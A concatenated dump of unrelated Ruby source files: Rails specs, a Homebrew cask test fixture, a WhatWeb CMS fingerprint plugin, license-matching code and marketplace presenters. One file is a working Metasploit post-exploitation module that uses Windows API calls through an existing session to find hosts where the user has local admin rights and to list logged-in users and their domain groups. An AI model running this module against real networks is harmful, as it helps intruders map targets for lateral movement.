if instance_variable_defined?(:@response_body)
@response_body
else
@response_body = begin
case
when response.header["Content-Type"].try(:include?, "image/")
response.header["Content-Type"]
when response.header["Content-Type"].try(:include?, "application/json")
response_body_parsed_as_json
else
response.body
end
end
end
end
def response_body_parsed_as_json
JSON.pretty_generate(JSON.parse(response.body))
rescue JSON::ParserError
end
def controller
request.params[:controller]
end
def action
request.params[:action]
end
def using_rack_test?
!!defined?(Rack::Test::Methods) && @context.class.ancestors.include?(Rack::Test::Methods)
end
def transaction
@transaction ||= Autodoc::Transaction.build(@context)
end
def description
if @context.respond_to?(:description)
@context.description.strip_heredoc
else
example.description.sub(/\A./, &:upcase).concat('.')
end
end
def path
example.full_description[%r<(GET|POST|PATCH|PUT|DELETE) ([^ ]+)>, 2]
end
def parameters_section
if has_validators? && parameters.present?
"\n### Parameters\n#{parameters}\n"
end
end
def parameters
validators.map {|validator| Parameter.new(validator) }.join("\n")
end
def has_validators?
!!(defined?(WeakParameters) && validators)
end
def validators
WeakParameters.stats[controller][action].try(:validators)
end
class Parameter
attr_reader :validator
def initialize(validator)
@validator = validator
end
def to_s
string = ""
string << "#{body}#{payload}"
if validator.respond_to? :validators
validator.validators.each do |x|
string << "\n"
string << Parameter.new(x).to_s.indent(2)
end
end
string
end
private
def body
if validator.key.nil?
"* #{validator.type}"
else
"* `#{validator.key}` #{validator.type}"
end
end
def payload
string = ""
string << " (#{assets.join(', ')})" if assets.any?
string << " - #{validator.options[:description]}" if validator.options[:description]
string
end
def assets
@assets ||= [required, only, except].compact
end
def required
"required" if validator.required?
end
def only
"only: `#{validator.options[:only].inspect}`" if validator.options[:only]
end
def except
"except: `#{validator.options[:except].inspect}`" if validator.options[:except]
end
end
end
end
| 24.270758 | 113 | 0.607021 |
f8e26ba7e4fd14919fedea05af6ad9ef7a555ad0 | 4,092 | # frozen_string_literal: true
require 'spec_helper'
require 'generators/bounded_context/bounded_context_generator'
module BoundedContext
module Generators
RSpec.describe BoundedContextGenerator do
RSpec::Matchers.define :match_content do |expected|
match do |actual|
@matcher = ::RSpec::Matchers::BuiltIn::Match.new(expected)
@matcher.matches?(File.read(File.join(destination_root, actual)))
end
failure_message do
@matcher.failure_message
end
end
RSpec::Matchers.define :exists_at_destination_path do |_|
match do |actual|
@matcher = ::RSpec::Matchers::BuiltIn::Exist.new(File.join(destination_root, actual))
@matcher.matches?(File)
end
failure_message do
@matcher.failure_message
end
end
specify do
run_generator %w[payments]
expect('payments/lib/payments.rb').to match_content(<<~EOF)
module Payments
end
EOF
expect('config/application.rb').to match_content(<<~EOF)
config.paths.add 'payments/lib', eager_load: true
EOF
end
specify do
run_generator %w[Inventory]
expect('inventory/lib/inventory.rb').to match_content(<<~EOF)
module Inventory
end
EOF
expect('config/application.rb').to match_content(<<~EOF)
config.paths.add 'inventory/lib', eager_load: true
EOF
end
specify do
run_generator %w[mumbo_jumbo]
expect('mumbo_jumbo/lib/mumbo_jumbo.rb').to match_content(<<~EOF)
module MumboJumbo
end
EOF
expect('config/application.rb').to match_content(<<~EOF)
config.paths.add 'mumbo_jumbo/lib', eager_load: true
EOF
end
specify do
run_generator %w[identity_access --test_framework=rspec]
expect_identity_access_spec_helper
expect_identity_access_bc_spec
expect_identity_access_require_bc_spec
end
specify do
run_generator %w[IdentityAccess --test_framework=rspec]
expect_identity_access_spec_helper
expect_identity_access_bc_spec
expect_identity_access_require_bc_spec
end
specify do
run_generator %w[identity_access --test-framework=test_unit]
expect_identity_access_test_helper
end
specify do
run_generator %w[IdentityAccess --test-framework=test_unit]
expect_identity_access_test_helper
end
specify do
system_run_generator %w[IdentityAccess]
expect_identity_access_test_helper
end
specify do
run_generator %w[identity_access]
expect('identity_access/lib/identity_access/.keep').to exists_at_destination_path
end
def expect_identity_access_spec_helper
expect('identity_access/spec/spec_helper.rb').to match_content(<<~EOF)
ENV['RAILS_ENV'] = 'test'
$LOAD_PATH.push File.expand_path('../../../spec', __FILE__)
require File.expand_path('../../../config/environment', __FILE__)
require File.expand_path('../../../spec/rails_helper', __FILE__)
require_relative '../lib/identity_access'
EOF
end
def expect_identity_access_bc_spec
expect('identity_access/spec/identity_access_spec.rb').to match_content(<<~EOF)
require_relative 'spec_helper'
RSpec.describe IdentityAccess do
end
EOF
end
def expect_identity_access_require_bc_spec
expect('spec/identity_access_spec.rb').to match_content(<<~'EOF')
require 'rails_helper'
path = Rails.root.join('identity_access/spec')
Dir.glob("#{path}/**/*_spec.rb") do |file|
require file
end
EOF
end
def expect_identity_access_test_helper
expect('identity_access/test/test_helper.rb').to match_content(<<~EOF)
require_relative '../lib/identity_access'
EOF
end
end
end
end
| 28.027397 | 95 | 0.640518 |
33922862630b368ea61f2663ff886316cdd96069 | 312 | test_cask 'invalid-gpg-missing-key' do
version '1.2.3'
sha256 '9203c30951f9aab41ac294bbeb1dcef7bed401ff0b353dcb34d68af32ea51853'
url TestHelper.local_binary_url('caffeine.zip')
homepage 'http://example.com/invalid-gpg-missing-keys'
gpg 'http://example.com/gpg-signature.asc'
app 'Caffeine.app'
end
| 28.363636 | 75 | 0.778846 |
ff9c8cf9252bc152b5cd7baae2f9f6908e0437e5 | 1,248 | # frozen_string_literal: true
##
# This file is part of WhatWeb and may be subject to
# redistribution and commercial restrictions. Please see the WhatWeb
# web site for more information on licensing and terms of use.
# http://www.morningstarsecurity.com/research/whatweb
##
WhatWeb::Plugin.define "Kajona" do
@author = "Brendan Coles <[email protected]>" # 2012-07-19
@version = "0.1"
@description = "Kajona - Open Source Content Management System - Requires PHP & MySQL"
@website = "http://www.kajona.de/"
# Matches #
@matches = [
# Meta Generator
{ regexp: /<meta name="generator" content="Kajona., www\.kajona\.de" \/>/ },
# HTML Comment
{ regexp: /<!--\s+Website powered by Kajona. Open Source Content Management Framework/ },
# JavaScript
{ regexp: /<script type="text\/javascript">KAJONA_(DEBUG|WEBPATH) = / },
# Powered by text
{ text: '<div class="left">powered by Kajona</div>' },
# Footer
{ text: '<div id="footerContainer">powered by <a href="http://www.kajona.de" target="_blank" title="Kajona' },
# Admin Page # Footer # Year Detection
{ string: /<div class="copyright">© (20[\d]{2}) <a href="http:\/\/www\.kajona\.de" target="_blank" title="Kajona/ },
]
end
| 32.842105 | 125 | 0.659455 |
6262ef25d1fedc7261bea5c25fab36dae71d0da6 | 653 | require "spec_helper"
describe "authentication homepage" do
it "allows registered and confirmed user to log in" do
# Creates a dummy user
user = User.create!(:email => "[email protected]",
:first_name => "Test",
:last_name => "User",
:password => "AutolabProject")
user.skip_confirmation!
user.save!
# Simulates user log in
visit "/auth/users/sign_in"
fill_in "user_email", :with => "[email protected]"
fill_in "user_password", :with => "AutolabProject"
click_button "Sign in"
expect(page).to have_content 'Signed in successfully.'
end
end
| 28.391304 | 58 | 0.601838 |
91966b04a1a0525c8f172445a71db9d832425fa1 | 1,627 | require "json"
require "faraday"
require "eth"
require "bip44"
require 'bigdecimal'
module TokenAdapter
class << self
attr_accessor :logger
end
class JSONRPCError < RuntimeError; end
class TxHashError < StandardError; end
class ConnectionRefusedError < StandardError; end
class TransactionError < StandardError; end
end
require "token_adapter/client/json_rpc"
require "token_adapter/client/ethereum"
require "token_adapter/version"
require "token_adapter/base"
require "token_adapter/ethereum"
require "token_adapter/ethereum/eth"
require "token_adapter/ethereum/erc20"
require "token_adapter/ethereum/atm"
require "token_adapter/ethereum/eos"
require "token_adapter/ethereum/snt"
require "token_adapter/ethereum/bat"
require "token_adapter/ethereum/omg"
require "token_adapter/ethereum/mkr"
require "token_adapter/ethereum/mht"
require "token_adapter/ethereum/cxtc"
require "token_adapter/ethereum/bpt"
require "token_adapter/ethereum/egt"
require "token_adapter/ethereum/fut"
require "token_adapter/ethereum/trx"
require "token_adapter/ethereum/icx"
require "token_adapter/ethereum/ncs"
require "token_adapter/ethereum/sda"
require "token_adapter/ethereum/icc"
require "token_adapter/ethereum/mag"
require "token_adapter/ethereum/erc223"
require "token_adapter/ethereum/ext"
require "token_adapter/ethereum/fllw"
require "token_adapter/ethereum/wbt"
require "token_adapter/ethereum/gst"
require "token_adapter/ethereum/moac"
require "token_adapter/ethereum/ser"
require "token_adapter/btc"
require "token_adapter/ltc"
require "token_adapter/zec"
require "token_adapter/doge"
require "token_adapter/usdt"
| 29.053571 | 51 | 0.822372 |
618f9a462d1d4572228ffc1602b4bc5aa8fa2485 | 8,654 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Post::Common
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Gather Local Admin Search',
'Description' => %q{
This module will identify systems in a given range that the
supplied domain user (should migrate into a user pid) has administrative
access to by using the Windows API OpenSCManagerA to establishing a handle
to the remote host. Additionally it can enumerate logged in users and group
membership via Windows API NetWkstaUserEnum and NetUserGetGroups.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>',
'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
],
'Platform' => [ 'windows'],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptBool.new('ENUM_USERS', [ true, 'Enumerates logged on users.', true]),
OptBool.new('ENUM_GROUPS', [ false, 'Enumerates groups for identified users.', true]),
OptString.new('DOMAIN', [false, 'Domain to enumerate user\'s groups for']),
OptString.new('DOMAIN_CONTROLLER', [false, 'Domain Controller to query groups'])
], self.class)
end
def setup
super
# This datastore option can be modified during runtime.
# Saving it here so the modified value remains with this module.
@domain_controller = datastore['DOMAIN_CONTROLLER']
if is_system?
# running as SYSTEM and will not pass any network credentials
print_error "Running as SYSTEM, module should be run with USER level rights"
return
else
@adv = client.railgun.advapi32
# Get domain and domain controller if options left blank
if datastore['DOMAIN'].nil? or datastore['DOMAIN'].empty?
user = client.sys.config.getuid
datastore['DOMAIN'] = user.split('\\')[0]
end
if @domain_controll.nil? and datastore['ENUM_GROUPS']
@dc_error = false
# Uses DC which applied policy since it would be a DC this device normally talks to
cmd = "gpresult /SCOPE COMPUTER"
# If Vista/2008 or later add /R
if (sysinfo['OS'] =~ /Build [6-9]\d\d\d/)
cmd << " /R"
end
res = cmd_exec("cmd.exe","/c #{cmd}")
# Check if RSOP data exists, if not disable group check
unless res =~ /does not have RSOP data./
dc_applied = /Group Policy was applied from:\s*(.*)\s*/.match(res)
if dc_applied
@domain_controller = dc_applied[1].strip
else
@dc_error = true
print_error("Could not read RSOP data, will not enumerate users and groups. Manually specify DC.")
end
else
@dc_error = true
print_error("User never logged into device, will not enumerate users and groups. Manually specify DC.")
end
end
end
end
# main control method
def run_host(ip)
connect(ip)
end
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa370669(v=vs.85).aspx
# enumerate logged in users
def enum_users(host)
userlist = Array.new
begin
# Connect to host and enumerate logged in users
winsessions = client.railgun.netapi32.NetWkstaUserEnum("\\\\#{host}", 1, 4, -1, 4, 4, nil)
rescue ::Exception => e
print_error("Issue enumerating users on #{host}")
return userlist
end
return userlist if winsessions.nil?
count = winsessions['totalentries'] * 2
startmem = winsessions['bufptr']
base = 0
userlist = Array.new
begin
mem = client.railgun.memread(startmem, 8*count)
rescue ::Exception => e
print_error("Issue reading memory for #{host}")
vprint_error(e.to_s)
return userlist
end
# For each entry returned, get domain and name of logged in user
begin
count.times{|i|
temp = {}
userptr = mem[(base + 0),4].unpack("V*")[0]
temp[:user] = client.railgun.memread(userptr,255).split("\0\0")[0].split("\0").join
nameptr = mem[(base + 4),4].unpack("V*")[0]
temp[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join
# Ignore if empty or machine account
unless temp[:user].empty? or temp[:user][-1, 1] == "$"
# Check if enumerated user's domain matches supplied domain, if there was
# an error, or if option disabled
data = ""
if datastore['DOMAIN'].upcase == temp[:domain].upcase and not @dc_error and datastore['ENUM_GROUPS']
data << " - Groups: #{enum_groups(temp[:user]).chomp(", ")}"
end
line = "\tLogged in user:\t#{temp[:domain]}\\#{temp[:user]}#{data}\n"
# Write user and groups to notes database
db_note(host, "#{temp[:domain]}\\#{temp[:user]}#{data}", "localadmin.user.loggedin")
userlist << line unless userlist.include? line
end
base = base + 8
}
rescue ::Exception => e
print_error("Issue enumerating users on #{host}")
vprint_error(e.backtrace)
end
return userlist
end
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa370653(v=vs.85).aspx
# Enumerate groups for identified users
def enum_groups(user)
grouplist = ""
dc = "\\\\#{@domain_controller}"
begin
# Connect to DC and enumerate groups of user
usergroups = client.railgun.netapi32.NetUserGetGroups(dc, user, 0, 4, -1, 4, 4)
rescue ::Exception => e
print_error("Issue connecting to DC, try manually setting domain and DC")
vprint_error(e.to_s)
return grouplist
end
count = usergroups['totalentries']
startmem = usergroups['bufptr']
base = 0
begin
mem = client.railgun.memread(startmem, 8*count)
rescue ::Exception => e
print_error("Issue reading memory for groups for user #{user}")
vprint_error(e.to_s)
return grouplist
end
begin
# For each entry returned, get group
count.to_i.times{|i|
temp = {}
groupptr = mem[(base + 0),4].unpack("V*")[0]
temp[:group] = client.railgun.memread(groupptr,255).split("\0\0")[0].split("\0").join
# Add group to string to be returned
grouplist << "#{temp[:group]}, "
if (i % 5) == 2
grouplist <<"\n\t- "
end
base = base + 4
}
rescue ::Exception => e
print_error("Issue enumerating groups for user #{user}, check domain")
vprint_error(e.backtrace)
return grouplist
end
return grouplist.chomp("\n\t- ")
end
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms684323(v=vs.85).aspx
# method to connect to remote host using windows api
def connect(host)
if @adv.nil?
return
end
user = client.sys.config.getuid
# use railgun and OpenSCManagerA api to connect to remote host
manag = @adv.OpenSCManagerA("\\\\#{host}", nil, 0xF003F) # SC_MANAGER_ALL_ACCESS
if(manag["return"] != 0) # we have admin rights
result = "#{host.ljust(16)} #{user} - Local admin found\n"
# Run enumerate users on all hosts if option was set
if datastore['ENUM_USERS']
enum_users(host).each {|i|
result << i
}
end
# close the handle if connection was made
@adv.CloseServiceHandle(manag["return"])
# Append data to loot table within database
print_good(result.chomp("\n")) unless result.nil?
db_loot(host, user, "localadmin.user")
else
# we dont have admin rights
print_error("#{host.ljust(16)} #{user} - No Local Admin rights")
end
end
# Write to notes database
def db_note(host, data, type)
report_note(
:type => type,
:data => data,
:host => host,
:update => :unique_data
)
end
# Write to loot database
def db_loot(host, user, type)
p = store_loot(type, 'text/plain', host, "#{host}:#{user}", 'hosts_localadmin.txt', user)
vprint_status("User data stored in: #{p}")
end
end
| 32.656604 | 113 | 0.618096 |
03483bffbe2fe632840d9b1998d3ba00e7345faa | 9,250 | require 'set'
require 'digest'
module Licensee
module ContentHelper
DIGEST = Digest::SHA1
START_REGEX = /\A\s*/.freeze
END_OF_TERMS_REGEX = /^[\s#*_]*end of terms and conditions\s*$/i.freeze
ALT_TITLE_REGEX = License::ALT_TITLE_REGEX
REGEXES = {
hrs: /^\s*[=\-\*]{3,}\s*$/,
all_rights_reserved: /#{START_REGEX}all rights reserved\.?$/i,
whitespace: /\s+/,
markdown_headings: /#{START_REGEX}#+/,
version: /#{START_REGEX}version.*$/i,
span_markup: /[_*~]+(.*?)[_*~]+/,
link_markup: /\[(.+?)\]\(.+?\)/,
block_markup: /^\s*>/,
border_markup: /^[\*-](.*?)[\*-]$/,
comment_markup: %r{^\s*?[/\*]{1,2}},
url: %r{#{START_REGEX}https?://[^ ]+\n},
bullet: /\n\n\s*(?:[*-]|\(?[\da-z]{1,2}[)\.])\s+/i,
developed_by: /#{START_REGEX}developed by:.*?\n\n/im,
quote_begin: /[`'"‘“]/,
quote_end: /[`'"’”]/
}.freeze
NORMALIZATIONS = {
lists: { from: /^\s*(?:\d\.|\*)\s+([^\n])/, to: '- \1' },
https: { from: /http:/, to: 'https:' },
ampersands: { from: '&', to: 'and' },
dashes: { from: /(?<!^)([—–-]+)(?!$)/, to: '-' },
quotes: {
from: /#{REGEXES[:quote_begin]}+([\w -]*?\w)#{REGEXES[:quote_end]}+/,
to: '"\1"'
}
}.freeze
# Legally equivalent words that schould be ignored for comparison
# See https://spdx.org/spdx-license-list/matching-guidelines
VARIETAL_WORDS = {
'acknowledgment' => 'acknowledgement',
'analogue' => 'analog',
'analyse' => 'analyze',
'artefact' => 'artifact',
'authorisation' => 'authorization',
'authorised' => 'authorized',
'calibre' => 'caliber',
'cancelled' => 'canceled',
'capitalisations' => 'capitalizations',
'catalogue' => 'catalog',
'categorise' => 'categorize',
'centre' => 'center',
'emphasised' => 'emphasized',
'favour' => 'favor',
'favourite' => 'favorite',
'fulfil' => 'fulfill',
'fulfilment' => 'fulfillment',
'initialise' => 'initialize',
'judgment' => 'judgement',
'labelling' => 'labeling',
'labour' => 'labor',
'licence' => 'license',
'maximise' => 'maximize',
'modelled' => 'modeled',
'modelling' => 'modeling',
'offence' => 'offense',
'optimise' => 'optimize',
'organisation' => 'organization',
'organise' => 'organize',
'practise' => 'practice',
'programme' => 'program',
'realise' => 'realize',
'recognise' => 'recognize',
'signalling' => 'signaling',
'sub-license' => 'sublicense',
'sub license' => 'sublicense',
'utilisation' => 'utilization',
'whilst' => 'while',
'wilful' => 'wilfull',
'non-commercial' => 'noncommercial',
'cent' => 'percent',
'owner' => 'holder'
}.freeze
STRIP_METHODS = %i[
hrs markdown_headings borders title version url copyright
block_markup span_markup link_markup
all_rights_reserved developed_by end_of_terms whitespace
].freeze
# A set of each word in the license, without duplicates
def wordset
@wordset ||= if content_normalized
content_normalized.scan(/(?:\w(?:'s|(?<=s)')?)+/).to_set
end
end
# Number of characteres in the normalized content
def length
return 0 unless content_normalized
content_normalized.length
end
# Number of characters that could be added/removed to still be
# considered a potential match
def max_delta
@max_delta ||= (length * Licensee.inverse_confidence_threshold).to_i
end
# Given another license or project file, calculates the difference in length
def length_delta(other)
(length - other.length).abs
end
# Given another license or project file, calculates the similarity
# as a percentage of words in common
def similarity(other)
overlap = (wordset & other.wordset).size
total = wordset.size + other.wordset.size
100.0 * (overlap * 2.0 / total)
end
# SHA1 of the normalized content
def content_hash
@content_hash ||= DIGEST.hexdigest content_normalized
end
# Content with the title and version removed
# The first time should normally be the attribution line
# Used to dry up `content_normalized` but we need the case sensitive
# content with attribution first to detect attribuion in LicenseFile
def content_without_title_and_version
@content_without_title_and_version ||= begin
@_content = nil
ops = %i[html hrs comments markdown_headings title version]
ops.each { |op| strip(op) }
_content
end
end
def content_normalized(wrap: nil)
@content_normalized ||= begin
@_content = content_without_title_and_version.downcase
(NORMALIZATIONS.keys + %i[spelling bullets]).each { |op| normalize(op) }
STRIP_METHODS.each { |op| strip(op) }
_content
end
if wrap.nil?
@content_normalized
else
Licensee::ContentHelper.wrap(@content_normalized, wrap)
end
end
# Backwards compatibalize constants to avoid a breaking change
def self.const_missing(const)
key = const.to_s.downcase.gsub('_regex', '').to_sym
REGEXES[key] || super
end
# Wrap text to the given line length
def self.wrap(text, line_width = 80)
return if text.nil?
text = text.clone
text.gsub!(REGEXES[:bullet]) { |m| "\n#{m}\n" }
text.gsub!(/([^\n])\n([^\n])/, '\1 \2')
text = text.split("\n").collect do |line|
if line =~ REGEXES[:hrs]
line
elsif line.length > line_width
line.gsub(/(.{1,#{line_width}})(\s+|$)/, "\\1\n").strip
else
line
end
end * "\n"
text.strip
end
def self.format_percent(float)
"#{format('%.2f', float)}%"
end
def self.title_regex
@title_regex ||= begin
licenses = Licensee::License.all(hidden: true, psuedo: false)
titles = licenses.map(&:title_regex)
# Title regex must include the version to support matching within
# families, but for sake of normalization, we can be less strict
without_versions = licenses.map do |license|
next if license.title == license.name_without_version
Regexp.new Regexp.escape(license.name_without_version), 'i'
end
titles.concat(without_versions.compact)
/#{START_REGEX}\(?(?:the )?#{Regexp.union titles}.*?$/i
end
end
private
def _content
@_content ||= content.to_s.dup.strip
end
def strip(regex_or_sym)
return unless _content
if regex_or_sym.is_a?(Symbol)
meth = "strip_#{regex_or_sym}"
return send(meth) if respond_to?(meth, true)
unless REGEXES[regex_or_sym]
raise ArgumentError, "#{regex_or_sym} is an invalid regex reference"
end
regex_or_sym = REGEXES[regex_or_sym]
end
@_content = _content.gsub(regex_or_sym, ' ').squeeze(' ').strip
end
def strip_title
while _content =~ ContentHelper.title_regex
strip(ContentHelper.title_regex)
end
end
def strip_borders
normalize(REGEXES[:border_markup], '\1')
end
def strip_comments
lines = _content.split("\n")
return if lines.count == 1
return unless lines.all? { |line| line =~ REGEXES[:comment_markup] }
strip(:comment_markup)
end
def strip_copyright
regex = Matchers::Copyright::REGEX
strip(regex) while _content =~ regex
end
def strip_end_of_terms
body, _partition, _instructions = _content.partition(END_OF_TERMS_REGEX)
@_content = body
end
def strip_span_markup
normalize(REGEXES[:span_markup], '\1')
end
def strip_link_markup
normalize(REGEXES[:link_markup], '\1')
end
def strip_html
return unless respond_to?(:filename) && filename
return unless File.extname(filename) =~ /\.html?/i
require 'reverse_markdown'
@_content = ReverseMarkdown.convert(_content, unknown_tags: :bypass)
end
def normalize(from_or_key, to = nil)
operation = { from: from_or_key, to: to } if to
operation ||= NORMALIZATIONS[from_or_key]
if operation
@_content = _content.gsub operation[:from], operation[:to]
elsif respond_to?("normalize_#{from_or_key}", true)
send("normalize_#{from_or_key}")
else
raise ArgumentError, "#{from_or_key} is an invalid normalization"
end
end
def normalize_spelling
normalize(/\b#{Regexp.union(VARIETAL_WORDS.keys)}\b/, VARIETAL_WORDS)
end
def normalize_bullets
normalize(REGEXES[:bullet], "\n\n* ")
normalize(/\)\s+\(/, ')(')
end
end
end
| 31.144781 | 80 | 0.571784 |
ac33a63edcf1f95184063da205511a7ec5ad2053 | 234 | set_name 'ProductInterest'
set_fields(
product: :belongs_to,
owner: :'references{polymorphic}'
)
set_view_schema :single_page_manager
describe_belongs_to_field :product, :Product, :product, :name, :link_to
describe_owner_field
| 19.5 | 71 | 0.799145 |
9116943bc5032f6cd52fcf2a72e8ac79f7bf49da | 335 | class Company < ActiveRecord::Base
belongs_to :industry
has_many :managers, :foreign_key => :manages_company_id
belongs_to :parent, :class_name => 'Company', :foreign_key => 'parent_id'
has_many :children, :class_name => 'Company', :foreign_key => 'parent_id'
counter_culture :parent, :column_name => :children_count
end
| 27.916667 | 75 | 0.734328 |
4ab07be989bd1ff1bcd86c0862519e19a6842cbf | 378 | class UseVdaysVpositionsDefaults < ActiveRecord::Migration
def up
change_column :conferences, :use_vpositions, :boolean, default: false
change_column :conferences, :use_vdays, :boolean, default: false
end
def down
change_column :conferences, :use_vpositions, :boolean, default: nil
change_column :conferences, :use_vdays, :boolean, default: nil
end
end
| 31.5 | 73 | 0.759259 |
1a0555be67d8d81207a77612a316aac2eac61f6e | 1,667 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module DSL
module Search
module Aggregations
# A multi-value metrics aggregation which calculates percentile ranks on numeric values
#
# @example
#
# search do
# aggregation :load_time_outliers do
# percentile_ranks do
# field 'load_time'
# values [ 15, 30 ]
# end
# end
# end
#
# @see https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-metrics-percentile-rank-aggregation.html
#
class PercentileRanks
include BaseComponent
option_method :field
option_method :values
option_method :script
option_method :params
option_method :compression
end
end
end
end
end
| 32.057692 | 139 | 0.656269 |
38e19bfb4010476f92009207c0adc1345cc9626b | 2,139 | #-- encoding: UTF-8
#-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2020 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
module Queries::Filters::Strategies
class BaseStrategy
attr_accessor :filter
class_attribute :supported_operators,
:default_operator
delegate :values,
:errors,
to: :filter
def initialize(filter)
self.filter = filter
end
def validate; end
def operator
operator_map
.slice(*self.class.supported_operators)[filter.operator]
end
def valid_values!; end
def supported_operator_classes
operator_map
.slice(*self.class.supported_operators)
.map(&:last)
.sort_by { |o| self.class.supported_operators.index o.symbol.to_s }
end
def default_operator_class
operator = self.class.default_operator || self.class.available_operators.first
operator_map[operator]
end
private
def operator_map
::Queries::Operators::OPERATORS
end
end
end
| 28.905405 | 91 | 0.713885 |
e97657c6612ca704bf656183d32afec7e4c225de | 977 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Arrow
VERSION = "0.16.0-SNAPSHOT"
module Version
numbers, TAG = VERSION.split("-")
MAJOR, MINOR, MICRO = numbers.split(".").collect(&:to_i)
STRING = VERSION
end
end
| 36.185185 | 62 | 0.746162 |
7ab53da39875aaec41d9223df1230f880a010fdd | 125 | class Category < ApplicationRecord
has_many :ad_has_categories
has_many :ads , :throught => :ad_has_categories
end
| 20.833333 | 52 | 0.752 |
f75e01d9d048367be0b37b2108efa24cd7fd4f4b | 905 | shared_examples "a protected admin controller" do |controller|
let(:args) do
{
host:Rails.application.config.baukis2[:admin][:host],
controller: controller
}
end
describe "#index" do
example "ログインフォームにリダイレクト" do
get url_for(args.merge(action: :index))
expect(response).to redirect_to(admin_login_url)
end
end
describe "#show" do
example "ログインフォームにリダイレクト" do
get url_for(args.merge(action: :show, id:1))
expect(response).to redirect_to(admin_login_url)
end
end
end
shared_examples "a protected singular admin controller" do |controller|
let(:args) do
{
host:Rails.application.config.baukis2[:admin][:host],
controller: controller
}
end
desribe "show" do
example "ログインフォームにリダイレクト" do
get url_for(args.merge(action: :show))
expect(response).to redirect_to(admin_login_url)
end
end
end | 23.815789 | 71 | 0.679558 |
0388dea5adb39d665cda59c41ce80d3616e25fa0 | 6,349 | class Admin2::TransactionsPresenter
include Collator
private
attr_reader :service
public
def initialize(params, service)
@params = params
@service = service
end
delegate :transactions, :transaction, :community, to: :service, prefix: false
FILTER_STATUSES = %w[free confirmed paid canceled preauthorized rejected
payment_intent_requires_action payment_intent_action_expired
disputed refunded dismissed]
def sorted_statuses
statuses = FILTER_STATUSES
statuses.map {|status|
["#{I18n.t("admin2.manage_transactions.status_filter.#{status}")} (#{count_by_status(status)})", status]
}.sort_by{|translation, _status| collator.get_sort_key(translation) }
end
def count_by_status(status = nil)
scope = service.transactions_scope.unscope(where: :current_state)
if status.present?
scope.where(current_state: status).count
else
scope.count
end
end
def has_search?
@params[:q].present? || @params[:status].present?
end
def show_link?(tx)
exclude = %w[pending payment_intent_requires_action payment_intent_action_expired]
!exclude.include?(tx.current_state)
end
def link_payment
case service.transaction.payment_gateway
when :stripe
"https://dashboard.stripe.com/search?query=#{service.transaction.id}"
when :paypal
'https://www.paypal.com/signin'
end
end
def text_link_payment
case service.transaction.payment_gateway
when :stripe
I18n.t('admin2.manage_transactions.view_in_stripe', id: service.transaction.id)
when :paypal
I18n.t('admin2.manage_transactions.view_in_paypal', id: service.transaction.id)
end
end
def show_commission_info?
return false unless service.transaction.payment_gateway == :paypal
PaypalPayment.find_by(transaction_id: transaction.id)&.commission_status == 'seller_is_admin'
end
def listing_title
transaction.listing_title
end
def localized_unit_type
transaction.unit_type.present? ? ListingViewUtils.translate_unit(transaction.unit_type, transaction.unit_tr_key) : nil
end
def localized_selector_label
transaction.unit_type.present? ? ListingViewUtils.translate_quantity(transaction.unit_type, transaction.unit_selector_tr_key) : nil
end
def booking
!!transaction.booking
end
def booking_per_hour
transaction.booking&.per_hour
end
def quantity
transaction.listing_quantity
end
def show_subtotal
!!transaction.booking || quantity.present? && quantity > 1 || transaction.shipping_price.present?
end
def payment
@payment ||= TransactionService::Transaction.payment_details(transaction)
end
def listing_price
transaction.unit_price
end
def start_on
booking ? transaction.booking.start_on : nil
end
def end_on
booking ? transaction.booking.end_on : nil
end
def duration
booking ? transaction.listing_quantity : nil
end
def subtotal
show_subtotal ? transaction.item_total : nil
end
def total
transaction.payment_total || payment[:total_price]
end
def seller_gets
total - transaction.commission - transaction.buyer_commission
end
def fee
transaction.commission
